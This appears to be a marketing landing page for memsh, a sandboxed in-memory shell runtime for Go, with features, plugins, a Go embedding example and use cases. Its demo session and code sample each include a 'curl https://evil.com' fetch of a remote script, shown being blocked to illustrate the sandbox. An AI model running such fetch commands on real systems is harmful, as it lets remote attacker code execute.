open source — sandboxed by default

A shell that
touches
nothing.

memsh is a hermetic, in-memory shell runtime for Go. Execute bash-like commands, run Python and JS, compose WASM plugins — all inside an isolated afero.MemMapFs. Zero real OS contact. Full observability. Embeds anywhere.

Get Started View on GitHub

<1ms

Session spinup

Real FS writes

∞

Parallel sessions

memsh — agent session #a3f2

# process JSON — zero real OS contact memsh $ echo '{"name":"alice","role":"admin"}' | jq -r .name alice # parse YAML config, output JSON memsh $ yq -jc .database /config.yaml {"host":"localhost","port":5432} # combine built-ins and scripting memsh $ ls -la /data | awk '{print $NF}' | sort report.json users.csv # unknown commands are blocked by default memsh $ curl https://evil.com/exec.sh curl: command not found memsh $

How it works

Three layers.
One guarantee.

Hermetic FS

Every file operation goes through afero.MemMapFs. The real OS filesystem is completely invisible to plugins, scripts, and commands. Nothing leaks in or out.

WASM Isolation

Plugins run as WASM modules via wazero. Each invocation gets a fresh module instance. No shared linear memory. No OS syscalls. No escape path.

Full Observability

Every command is logged. Every FS write is tracked. Snapshot and restore any session state. Replay executions deterministically. Audit everything.

Features

Built for
production use.

Not a toy shell. A production-grade embedded runtime with the guarantees that real systems need.

⚡

Sub-millisecond spinup

A session is just a Go struct. No container provisioning, no process fork, no warm pool needed. Spin up isolated sessions with zero infrastructure overhead.

Performance

🔒

Hermetic filesystem

All file operations go through afero.MemMapFs. The real OS filesystem is completely invisible. Nothing leaks in or out. Perfect for testing and sandboxing.

Security

🧩

WASM plugin support

Extend with custom plugins compiled to WASM via wazero. Write in Go (GOOS=wasip1), Rust, or C. OS-agnostic, capability-declared, fully isolated.

Extensibility

🐚

Real bash semantics

Powered by mvdan.cc/sh/v3 — the same parser used by production Go tooling. Full shell syntax, pipes, redirects, and control flow.

Compatibility

📦

30+ built-in commands

ls, cat, grep, awk, find, sort, diff, chmod, and more — plus native plugins: jq, yq, lua, goja, base64, wc. Combined short flags work everywhere (-rf, -la, -jrc).

Convenience

🛡️

Command sandbox

External OS commands are blocked by default. Only registered builtins and plugins can run. Opt-in to external execution via WithAllowExternalCommands(true).

Security

🔌

Embeddable Go library

Drop into any Go application. Use functional options: WithFS, WithStdIO, WithCwd, WithEnv, WithPlugin, WithAllowExternalCommands.

API

Plugin ecosystem

WASM plugins.
Real commands.

Author in TinyGo, Rust, or C. Distribute as a single .wasm file. OS-agnostic, version-pinned, capability-declared.

Native Go · gojq

Full jq expression engine. Field selection, pipes, array iteration, -r, -c, -n. Reads from virtual FS files or stdin.

Native Go · gojq + yaml.v3

YAML and JSON processing with jq syntax. YAML output by default, -j for JSON, -jc for compact JSON.

lua

Native Go · gopher-lua

Full Lua 5.1 interpreter. Inline -e, file execution, stdin. Access virtual FS via fs_readfile().

goja

Native Go · goja

ES2020+ JavaScript engine. Arrow functions, array methods, template literals. Access virtual FS via fs.readFile().

awk

Native Go · goawk

Full AWK interpreter. Pattern scanning, field extraction, -F delimiter, -f program file, NR/NF variables.

grep

Native Go

Regex search across virtual FS files. Combined flags -invcrl. Recursive directory search with -r.

find

Native Go

Walk the virtual filesystem. Filter by -name glob, -type f/d, -maxdepth.

base64 · wc

Native Go

Base64 encode/decode and word/line/byte counting. Plus custom WASM plugins via GOOS=wasip1.

Quick start

Embed in minutes.

Embed

import (
    "context"
    "bytes"
    "fmt"
    "github.com/spf13/afero"
    "github.com/amjadjibon/memsh/shell"
)

// pre-seed the virtual filesystem
fs := afero.NewMemMapFs()
afero.WriteFile(fs, "/config.yaml", []byte("host: localhost\nport: 5432\n"), 0644)

// create a sandboxed shell session
var out bytes.Buffer
sh, _ := shell.New(
    shell.WithFS(fs),
    shell.WithStdIO(nil, &out, &out),
)
defer sh.Close()

// jq, yq, awk, grep, lua, goja — all sandboxed
ctx := context.Background()
sh.Run(ctx, `
    yq -r .host /config.yaml
    echo '{"users":["alice","bob"]}' | jq -r '.users[]'
    curl https://evil.com  # blocked: command not found
`)

// localhost\nalice\nbob
fmt.Print(out.String())
    

Use cases

What people
build with it.

AI / Agents

Code Interpreter Backend

Safe execution environment for LLM-generated code. No containers, no VMs, sub-ms spinup.

→

DevOps

Shell Script Test Framework

Hermetic, parallel shell tests with pre-seeded fixtures. No temp dirs, no cleanup.

→

Platform Eng

GitOps Dry-run Engine

Run Terraform and Helm against a virtual FS. See the diff without touching real infra.

→

EdTech

Interactive Shell Tutorials

Real bash semantics, hermetic environment. Students can't break anything. No VM cost.

→

Compliance

Reproducible Audit Trails

Prove what ran, on what data, with what output. Session replay for regulatory submissions.

→

SRE

Executable Runbooks

Runbook steps that actually execute and verify. Alerts when a step starts failing before an incident.

→

A shell that touches nothing.

Three layers.One guarantee.

Built forproduction use.

WASM plugins.Real commands.

Embed in minutes.

What peoplebuild with it.

Start buildingtoday.

A shell that
touches
nothing.

Three layers.
One guarantee.

Built for
production use.

WASM plugins.
Real commands.

What people
build with it.

Start building
today.